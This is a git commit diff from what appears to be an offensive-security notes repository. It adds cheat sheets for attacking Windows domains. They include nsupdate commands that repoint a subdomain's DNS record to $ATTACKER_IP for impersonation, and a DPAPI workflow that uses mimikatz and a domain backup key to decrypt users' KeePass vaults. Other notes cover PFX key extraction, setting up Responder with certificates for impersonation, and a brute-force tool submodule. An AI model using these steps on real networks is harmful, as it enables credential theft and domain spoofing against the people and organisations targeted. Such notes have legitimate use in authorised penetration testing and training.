whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bookmarks

This commit is contained in:
Stefan Friese 2022-08-03 00:30:03 +02:00
parent c9f4187e9b
commit 1b337521b8
8 changed files with 97 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitmodules vendored
View File

@ -181,3 +181,6 @@
[submodule "misc/level3_hypervisor/kubeletctl"]
path = misc/level3_hypervisor/kubeletctl
url = https://github.com/cyberark/kubeletctl.git
[submodule "misc/bruteforce/patator"]
path = misc/bruteforce/patator
url = https://github.com/lanjelot/patator.git

14
enumeration/docs/dns.md
View File

@ -9,3 +9,17 @@ drill @$TARGET_DNS $DOMAIN axfr
```
* [subrake](https://github.com/hash3liZer/Subrake.git)
## Join a Domain
* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
* Check domain by querying the subdomain's A record via dig/drill/nslookup

27
exploit/windows/docs/dpapi.md Normal file
View File

@ -0,0 +1,27 @@
# DPAPI
* [Jarno Baselier](https://jarnobaselier-nl.translate.goog/crack-dpapi-met-cqure-cqtools/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=nui)
* [Insecurity's take](https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/#The_DPAPILAB-NG_Toolset)
* [tinyapps' replace and recover domian cached credentials](https://tinyapps.org/docs/domain-cached-credentials.html)
* [ired's reading dpapi encrypted secrets with mimikatz and c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++)
## Tools
* [tjldeneut's dpaping-lab](https://github.com/tijldeneut/dpapilab-ng.git)
* [BlackDiverX's unpacked cqtools]( https://github.com/BlackDiverX/cqtools)
* Use [CQTools](https://github.com/paulacqure/CQTools.git) with care, __CQMasterKeyAD.exe__ does not work correctly. It will drive you mad. Here is the workaround
Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI
* Get the pvk backup key from the DC via mimikatz
* Get the entropy via `CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe`
* Get the encrypted blob
* Get the user's Masterkey under `C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\`
* Use dpapilab-ng's `keepassdec.py`
```sh
./keepassdec.py --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin
```
* Use the decrypted blob to
```sh
CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx
```
* Open the `*.kdbx` file

5
hashes/hashcat_utils.md
View File

@ -4,3 +4,8 @@
```sh
combinator wordlist.txt otherwordlist.txt > newwordlist.txt
```
* Create wordlist
```sh
hashcat --force <input.txt> -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
```

1
misc/bruteforce/patator Submodule

@ -0,0 +1 @@
Subproject commit 46908228cc85fbc032426a12d048fa372e213da4

17
misc/openssl/openssl.md Normal file
View File

@ -0,0 +1,17 @@
# OpenSSL Cheatsheet
## Extract keys from PFX Cert
* Key and cert form PFX
```sh
openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes
openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys
```
## Extract & Repack PFX Cert
* Extract & Repack with another password, e.g. from `mimikatz` to `cqure`
```sh
openssl pkcs12 -in *.pfx -out temp.pem -nodes
openssl pkcs12 -export -out *.pfx -in temp.pem
```

21
misc/responder.md Normal file
View File

@ -0,0 +1,21 @@
# Responder
## Impersonate Domain -- Change Responder's certificates
* After using nsupdate to add the attacker as a subdomain do the following tasks
* Add a certificate and its private key to
```sh
/usr/share/responder/certs
```
* Edit `Responder.conf`
```
[HTTPS Server]
; Configure SSL Certificates to use
SSLCert = certs/cert.pem
SSLKey = certs/key.pem
```
* Start responder
```sh
responder -I <interface>
```

9
osint/osint_links.txt Normal file
View File

@ -0,0 +1,9 @@
https://urlscan.io/
https://abuse.ch
https://bazaar.abuse.ch/
https://feodotracker.abuse.ch/
https://sslbl.abuse.ch/
https://urlhaus.abuse.ch/
https://threatfox.abuse.ch/
https://www.phishtool.com/
https://talosintelligence.com/